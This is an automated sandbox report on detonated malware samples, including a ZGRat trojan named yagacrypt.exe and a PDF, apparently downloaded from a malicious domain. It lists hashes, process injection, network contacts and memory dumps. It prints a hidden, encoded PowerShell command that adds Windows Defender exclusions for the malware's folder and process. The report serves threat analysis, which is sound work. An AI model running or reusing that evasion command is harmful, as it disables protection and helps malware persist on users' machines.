C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 dbbe3b2e56558f128653635d80156427
SHA1 692dcec13ab48af5614982611af2cc048a30035f
SHA256 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961
SHA512 e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 d44d10fd7d523b4d7a542884b3d0c6c0
SHA1 802e80c8ed851937837bbe3e125d82a6b9a62adc
SHA256 41536c80d8df63804cbea59bfaab27bf06e8ae682b88a961a2c4a66db5bc15e5
SHA512 363963e55185b9e3a13f2de14c3170548172556d432defb358e7d28a2dba6c7f3cfb6a2891ca2f5fc99e8bc13bbf51973bbede5765a6ee9f15bf9f89622213e4

Analysis: behavioral26

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

149s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 4044 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
PID 3740 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 3740 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5080 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp

Files

memory/4044-0-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4044-1-0x00000000003B0000-0x00000000003C4000-memory.dmp

memory/4044-2-0x00000000027B0000-0x00000000027C0000-memory.dmp

memory/4044-3-0x0000000002780000-0x0000000002786000-memory.dmp

memory/4044-4-0x0000000005880000-0x00000000059AA000-memory.dmp

memory/4044-5-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-6-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-8-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-10-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-12-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-18-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-20-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-24-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-26-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-22-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-16-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-14-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-28-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-30-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-32-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-34-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-36-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-38-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-42-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-46-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-50-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-52-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-56-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-60-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-62-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-64-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-58-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-66-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-54-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-48-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-44-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-40-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-68-0x0000000005880000-0x00000000059A3000-memory.dmp

memory/4044-937-0x00000000059C0000-0x00000000059C1000-memory.dmp

memory/4044-938-0x0000000005BA0000-0x0000000005C60000-memory.dmp

memory/4044-939-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

memory/4044-940-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4044-941-0x00000000027B0000-0x00000000027C0000-memory.dmp

memory/4044-942-0x0000000006490000-0x0000000006A34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/208-946-0x0000000000400000-0x000000000049C000-memory.dmp

memory/208-947-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-949-0x0000000003110000-0x0000000003120000-memory.dmp

memory/208-948-0x00000000056D0000-0x00000000057B8000-memory.dmp

memory/4044-952-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-3179-0x0000000005830000-0x0000000005886000-memory.dmp

memory/208-3180-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/208-3181-0x0000000005EF0000-0x0000000005F44000-memory.dmp

memory/208-3182-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/208-3184-0x0000000074B00000-0x00000000752B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d42etw3k.fcj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2308-3190-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/2308-3191-0x000001C2DC300000-0x000001C2DC310000-memory.dmp

memory/2308-3196-0x000001C2DC2D0000-0x000001C2DC2F2000-memory.dmp

memory/2308-3197-0x000001C2DC300000-0x000001C2DC310000-memory.dmp

memory/2308-3200-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe

MD5 0abd42634db4f4fb3bbbcaa066413d68
SHA1 074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256 a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2

memory/3740-3203-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/3740-3204-0x0000000005350000-0x0000000005360000-memory.dmp

memory/3740-4137-0x0000000005FF0000-0x0000000005FF1000-memory.dmp

memory/5080-4143-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/5080-4144-0x0000000005130000-0x0000000005140000-memory.dmp

memory/3740-4145-0x0000000005350000-0x0000000005360000-memory.dmp

memory/3740-4146-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/4404-6376-0x0000000074B00000-0x00000000752B0000-memory.dmp

memory/5080-6377-0x0000000074B00000-0x00000000752B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1468-6748-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/1468-6765-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/1468-7031-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

memory/1468-7192-0x00000159D10E0000-0x00000159D10F0000-memory.dmp

memory/4404-7325-0x0000000005990000-0x0000000005991000-memory.dmp

memory/1468-7327-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp

memory/4404-7328-0x0000000074B00000-0x00000000752B0000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

153s

Max time network

160s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3916 wrote to memory of 1652 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 1652 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 1652 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 4544 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 4544 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 4544 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 2760 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 2760 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 2760 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 3716 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 3716 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 3716 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
